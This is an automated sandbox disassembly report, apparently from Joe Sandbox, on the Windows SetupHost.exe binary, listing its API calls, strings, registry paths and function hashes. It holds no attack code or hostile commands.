                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: CSetupHost::InitializeComponents$MediaSetupUIMgr.dll$SetupCore.dll$SetupHost: Automation information initialized.$SetupHost: Automation information not found. Releasing automation object.$SetupHost: Automation initialization failed: [0x%X]$SetupHost: Initializing automation...$SetupHost: Loading AutomationManager manager...$SetupHost: Looking for automation file...$SetupHost: OneSettings initialization failed: [0x%X]$SetupHost: Using automation file: [%s]...$SetupHost::InitializeComponents$SetupMgr.dll
                                                                                                                        • API String ID: 431132790-311080171
                                                                                                                        • Opcode ID: f72d01ac9a946892c84754547dd48622dc8ad48537b7c9a153ab1a536f0b44a7
                                                                                                                        • Instruction ID: 86da58f3734d76deef9bf48fa477bc3749055ca62157569dee4c87366246f9b2
                                                                                                                        • Opcode Fuzzy Hash: f72d01ac9a946892c84754547dd48622dc8ad48537b7c9a153ab1a536f0b44a7
                                                                                                                        • Instruction Fuzzy Hash: 0842A2757006118BCF059F65D8A8A2E7762EF8C312F19446BED069B391DF38EC02DB99
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000680,0000001C,004EB1D8,00000008,00000000), ref: 004F807E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004F8085
                                                                                                                          • Part of subcall function 004FA6C1: __EH_prolog3_GS.LIBCMT ref: 004FA6CB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 004F820D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004F8214
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F7FB8
                                                                                                                          • Part of subcall function 004F9B21: GetProcessHeap.KERNEL32(00000000,?,004E7D2F), ref: 004F9B2B
                                                                                                                          • Part of subcall function 004F9B21: HeapFree.KERNEL32(00000000), ref: 004F9B32
                                                                                                                          • Part of subcall function 0054B274: NtQueryLicenseValue.NTDLL(00553190,00000000,00000000,00000004,00000000), ref: 0054B320
                                                                                                                        Strings
                                                                                                                        • %s=%s, xrefs: 004F81B0
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings, xrefs: 004F8013, 004F80EA, 004F819E
                                                                                                                        • %s;%s=%s, xrefs: 004F817F
                                                                                                                        • OneSettings: Initialization succeeded, but no values found., xrefs: 004F8251
                                                                                                                        • OneSettings: Initialization succeeded, found %d values., xrefs: 004F8231
                                                                                                                        • OneSettings: Blocked by policy settings., xrefs: 004F8289
                                                                                                                        • OneSettings: Initialization failed -> [0x%X], xrefs: 004F8263
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$FreeH_prolog3$AllocH_prolog3_LicenseQueryValue
                                                                                                                        • String ID: %s;%s=%s$%s=%s$CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings$OneSettings: Blocked by policy settings.$OneSettings: Initialization failed -> [0x%X]$OneSettings: Initialization succeeded, but no values found.$OneSettings: Initialization succeeded, found %d values.
                                                                                                                        • API String ID: 4122440011-3034588626
                                                                                                                        • Opcode ID: 4d63c2a0f02d05389fc00308550732c7ac50a7e0dee02730f94c20962a9fc9ef
                                                                                                                        • Instruction ID: 128524762a5b9cd83d83d60bac6a7df58dc7c0600babe30fe9ec9ca3f39a858d
                                                                                                                        • Opcode Fuzzy Hash: 4d63c2a0f02d05389fc00308550732c7ac50a7e0dee02730f94c20962a9fc9ef
                                                                                                                        • Instruction Fuzzy Hash: E1A16070A0020A9BDF14DFA5C996BBE77B4BF44304F14445EEA05AF285DF78D901CBA9
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32 ref: 0054294F
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                        • memset.MSVCRT ref: 00542A87
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 00542AD6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$EnvironmentExpandFreeHandleLoadModuleStringsVersionmemset
                                                                                                                        • String ID: %windir%\system32\dbghelp.dll$AddVectoredExceptionHandler$MiniDumpWriteDump$kernel32
                                                                                                                        • API String ID: 997276966-3676913557
                                                                                                                        • Opcode ID: 4f3d23f8495d61dd7cdeb5c7c035987d725cffb9b632a061f48db4418eab980f
                                                                                                                        • Instruction ID: 37458eab2546af16f5250028513368a4b3b30e226a295adde306c18b01fb427a
                                                                                                                        • Opcode Fuzzy Hash: 4f3d23f8495d61dd7cdeb5c7c035987d725cffb9b632a061f48db4418eab980f
                                                                                                                        • Instruction Fuzzy Hash: 6741D0B85063A49FCB109F61EC6A69B3EE8B72474EFD04519B8059B260D7F0954CEF90
                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(005526B8,00000010,00540CDD), ref: 00540B5D
                                                                                                                        • EnterCriticalSection.KERNEL32(005566F8), ref: 00540B75
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00540B89
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00540B90
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000006), ref: 00540BD5
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 00540BDC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00008010), ref: 00540C05
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00540C0C
                                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 00540C2F
                                                                                                                        • LeaveCriticalSection.KERNEL32(005566F8), ref: 00540C92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocCriticalSectionValue$AllocateEnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 137540307-0
                                                                                                                        • Opcode ID: bfb78a18ed119b4965184bb20a18e21c2957031b116dacd13f57df7e0df61f92
                                                                                                                        • Instruction ID: dcb7c709f0d19bcd538503de63b73c2283b9909e8e82d932590ff1cb7d21e7c0
                                                                                                                        • Opcode Fuzzy Hash: bfb78a18ed119b4965184bb20a18e21c2957031b116dacd13f57df7e0df61f92
                                                                                                                        • Instruction Fuzzy Hash: AB319078506384DFC7219F64ECA9A6EBFB9FB68B47B50412DE905932A0CB714809FF10
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,?,00000000), ref: 004FF667
                                                                                                                          • Part of subcall function 004FE347: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,004FF550,?,00000000), ref: 004FE367
                                                                                                                          • Part of subcall function 004FE347: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE38E
                                                                                                                          • Part of subcall function 004FE347: HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE395
                                                                                                                          • Part of subcall function 004FE347: SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE3A6
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,00000000), ref: 004FF599
                                                                                                                        • VerQueryValueW.VERSION(?,?,?,00000004,?,?,?,?,00000000), ref: 004FF603
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 004FF632
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF639
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FF641
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FF652
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004FF65B
                                                                                                                          • Part of subcall function 004FF496: GetFileVersionInfoSizeExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4B0
                                                                                                                          • Part of subcall function 004FF496: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 004FF4C1
                                                                                                                          • Part of subcall function 004FF496: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FF4C8
                                                                                                                          • Part of subcall function 004FF496: GetFileVersionInfoExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4E0
                                                                                                                          • Part of subcall function 004FF496: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FF506
                                                                                                                          • Part of subcall function 004FF496: HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF50D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorLast$Process$FileFree$InfoQueryValueVersion$AllocAttributesSize_vsnwprintf
                                                                                                                        • String ID: FileVersion$\StringFileInfo\%04X%04X\%s$\VarFileInfo\Translation
                                                                                                                        • API String ID: 4187551046-3407502573
                                                                                                                        • Opcode ID: dec604e0c0865b1bbe6c6d71c347372d9c71811f0b17859a105fe8380593dffd
                                                                                                                        • Instruction ID: 1ab35fb89ec76765b158664df042787a8f4c28346c60b15a97147f7092adddc0
                                                                                                                        • Opcode Fuzzy Hash: dec604e0c0865b1bbe6c6d71c347372d9c71811f0b17859a105fe8380593dffd
                                                                                                                        • Instruction Fuzzy Hash: F731FD31A4031D9BDB209B609C88BFB7378EF28706F0004BBE605D6260DF749D4A9F65
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • %u.%u.%s, xrefs: 004FC26C
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FC2D9
                                                                                                                        • OneSettings: Failed to update UBR: [0x%X], xrefs: 004FC374
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer, xrefs: 004FC1D9, 004FC20C, 004FC2AE
                                                                                                                        • UBR, xrefs: 004FC2D4
                                                                                                                        • OneSettings: Failed to get UBR: [0x%X], xrefs: 004FC333
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR, xrefs: 004FC2FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_memset
                                                                                                                        • String ID: %u.%u.%s$CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer$CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR$OneSettings: Failed to get UBR: [0x%X]$OneSettings: Failed to update UBR: [0x%X]$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                        • API String ID: 2828583354-2934946344
                                                                                                                        • Opcode ID: 6a1494fd8eb4435916cfc5508ae18e6a1b6e389571cade5df53326b74aaf5535
                                                                                                                        • Instruction ID: 9deca255a6137cbbfc1f91b839cc959c7fd5c06d5e7648bef3f1bfb5a5f681c5
                                                                                                                        • Opcode Fuzzy Hash: 6a1494fd8eb4435916cfc5508ae18e6a1b6e389571cade5df53326b74aaf5535
                                                                                                                        • Instruction Fuzzy Hash: 91615074B4122C8BDB259F65CD81BFD72B5EB48744F1040EEEA09AB351DA789E84CF48
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0054AF95
                                                                                                                          • Part of subcall function 0054AA94: LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,00000001,0054AFA2,00000000,00000001,00000001), ref: 0054AAA3
                                                                                                                          • Part of subcall function 0054AA94: GetProcAddress.KERNEL32(00000000,RtlIsStateSeparationEnabled), ref: 0054AAB3
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?,00000000,00000001,00000001), ref: 0054AFF5
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054B03D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0054B06A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0054B071
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0054B0B9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001), ref: 0054B17C
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0054B183
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001), ref: 0054B198
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocCloseEnumFreeInfoLibraryLoadOpenProcQuerymemset
                                                                                                                        • String ID: \Users
                                                                                                                        • API String ID: 3246958429-3656258783
                                                                                                                        • Opcode ID: 605280ad105044e195728f2146cd13c97eaac52e38f9ffe934104b217f4002e7
                                                                                                                        • Instruction ID: 1910a23ec575a6160baa5701f8760e426ca2552b0eae66b0df4ef0ef1563527d
                                                                                                                        • Opcode Fuzzy Hash: 605280ad105044e195728f2146cd13c97eaac52e38f9ffe934104b217f4002e7
                                                                                                                        • Instruction Fuzzy Hash: CB51B076C41239ABEB219B64DC9DBDEBBB4BB18705F1001D9E909A7251D7349E80CFA0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00540CCF
                                                                                                                        • FormatMessageW.KERNEL32(00000900,00000000,00000400,00000000,00000000,?), ref: 00540D24
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00540D55
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00540D5C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00540DA8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00540DAF
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00540DBE
                                                                                                                        • SetLastError.KERNEL32(?), ref: 00540DD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorFreeLastProcess$AllocFormatLocalMessage
                                                                                                                        • String ID: ConstructPartialMsgVW: MALLOC failed$Log: Failed To Get Msg From ID
                                                                                                                        • API String ID: 804065711-4092388093
                                                                                                                        • Opcode ID: 95e21946745c627086a538e13430b63de2550fdbee86cdaf72d95589c0d61540
                                                                                                                        • Instruction ID: 05b59c0f46367b6926ae5fd61ce91a862142feb8a3a29de89d9468f263052643
                                                                                                                        • Opcode Fuzzy Hash: 95e21946745c627086a538e13430b63de2550fdbee86cdaf72d95589c0d61540
                                                                                                                        • Instruction Fuzzy Hash: 8B31C336A04304ABD7059FE4DC58BEA7BB9FF58319F245429FA05D72A0D7349D08EB14
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A260
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-0000001E,?,?,?,00000001,00000000,00000000), ref: 0054A28C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,00000000,00000000), ref: 0054A293
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A30E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A315
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreeValue_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$ETag
                                                                                                                        • API String ID: 4126488486-4233363893
                                                                                                                        • Opcode ID: 130e3b98e65d67f5bd11c03b166bf18f3e1ab6bff751e9f111d818bbeaead1c9
                                                                                                                        • Instruction ID: 71ec77b30ba9375a133bb049bb147e246f513846a74f1a1c7d3e6c7f151b1e4f
                                                                                                                        • Opcode Fuzzy Hash: 130e3b98e65d67f5bd11c03b166bf18f3e1ab6bff751e9f111d818bbeaead1c9
                                                                                                                        • Instruction Fuzzy Hash: CE31E57698032DABC7208B518C4CFEF7BBCFB98715F110196F909E7241DA709E448BA1
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004E3522
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004E35A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentErrorLastThread
                                                                                                                        • String ID: %s, LOG: [0x%X] [%s] [%s]$CSetupDiagnostics::LogString$ERROR$INFO$WARNING$base\ntsetup\conx\mosetup\setuphost\DiagnosticsImpl.h
                                                                                                                        • API String ID: 1800743499-698197140
                                                                                                                        • Opcode ID: f50c22238bc6ab2b39f9d4617c0776916f76092659f5694536888c1a1dd9ec04
                                                                                                                        • Instruction ID: 1c79147e437f50940c6c12c61228325b88719b28e02be62af87da2c43dae0872
                                                                                                                        • Opcode Fuzzy Hash: f50c22238bc6ab2b39f9d4617c0776916f76092659f5694536888c1a1dd9ec04
                                                                                                                        • Instruction Fuzzy Hash: 05212132604340BBC712AF66990DA3B7BA5ABC531AF10452FF5184B341D739CE04879A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • CSystemHelper::ThreadExecute, xrefs: 004E6A0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventLast
                                                                                                                        • String ID: CSystemHelper::ThreadExecute
                                                                                                                        • API String ID: 3848097054-703347033
                                                                                                                        • Opcode ID: a64855c5b7b49c29481141c9c3c8085d44f460152700a5a8a77a0f3b3f1b0f89
                                                                                                                        • Instruction ID: 1c78e156aec5af61057cd47c89aacb3a437928c20d77a3fd613aadc878a105c2
                                                                                                                        • Opcode Fuzzy Hash: a64855c5b7b49c29481141c9c3c8085d44f460152700a5a8a77a0f3b3f1b0f89
                                                                                                                        • Instruction Fuzzy Hash: 1D210431704348ABCB006F72DC9896ABBA8FF58762F11442BFA05C7242DB38DC04DB99
APIs
• memset.MSVCRT ref: 005404D0
• RegOpenKeyExW.KERNEL32(80000002,SYSTEM\Setup\Panther,00000000,00020019,?,?,02000000,65000000), ref: 005404FB
• RegQueryValueExW.ADVAPI32(?,TelemetryAssertList,00000000,00000000,?,?,?,02000000,65000000), ref: 00540520
• RegCloseKey.ADVAPI32(?,?,02000000,65000000), ref: 00540531
• GetEnvironmentVariableW.KERNEL32(PANTHER_ENABLE_TELASSERT,?,00000104,?,02000000,65000000), ref: 0054054C
Strings
Similarity
• API ID: CloseEnvironmentOpenQueryValueVariablememset
• String ID: PANTHER_ENABLE_TELASSERT$SYSTEM\Setup\Panther$TelemetryAssertList
• API String ID: 3483029746-3368635653
APIs
• ImpersonateLoggedOnUser.ADVAPI32(?,?,?,?,00000000,00000000,00000000), ref: 00548A51
• WinHttpSetCredentials.WINHTTP(?,00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00548AB8
• RevertToSelf.ADVAPI32(?,?,?,?,?), ref: 00548AD9
  • Part of subcall function 00548F32: WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
  • Part of subcall function 00548F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
  • Part of subcall function 00548F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
  • Part of subcall function 00548F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
  • Part of subcall function 00548F32: CloseHandle.KERNEL32(00000000), ref: 00548FFE
  • Part of subcall function 00548F32: WTSFreeMemory.WTSAPI32(?), ref: 0054900D
• GetLastError.KERNEL32 ref: 00548B1B
• GetLastError.KERNEL32 ref: 00548B3B
• ExitProcess.KERNEL32 ref: 00548B42
• RevertToSelf.ADVAPI32(00000000,00000000), ref: 00548B81
• ReleaseMutex.KERNEL32(00000000,00000000,00000000), ref: 00548B90
• CloseHandle.KERNEL32(00000000), ref: 00548B97
  • Part of subcall function 0054A619: CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 0054A66A
  • Part of subcall function 0054A619: WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,00000001), ref: 0054A67C
  • Part of subcall function 00549C98: RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008,?,?,?,00000001,00000001,00000000), ref: 00549D41
  • Part of subcall function 00549C98: RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004,?,?,?,00000001,00000001,00000000), ref: 00549D6B
  • Part of subcall function 00549C98: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00549D96
Similarity
• API ID: ErrorLast$CloseHandleMutexRevertSelfTimeUserValue$ActiveConsoleCreateCredentialsEnumerateExitFileFreeHttpImpersonateLoggedMemoryObjectProcessQueryReleaseSessionSessionsSingleSystemTokenWait
• String ID:
• API String ID: 729768055-0
APIs
  • Part of subcall function 004FC6D3: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?,00000000,80000002,80000002,?,004FB5A2,?,00000000,?), ref: 004FC6F0
  • Part of subcall function 004FC6D3: RegCloseKey.ADVAPI32(00000000,004FB5A2,?,00000000,?), ref: 004FC72B
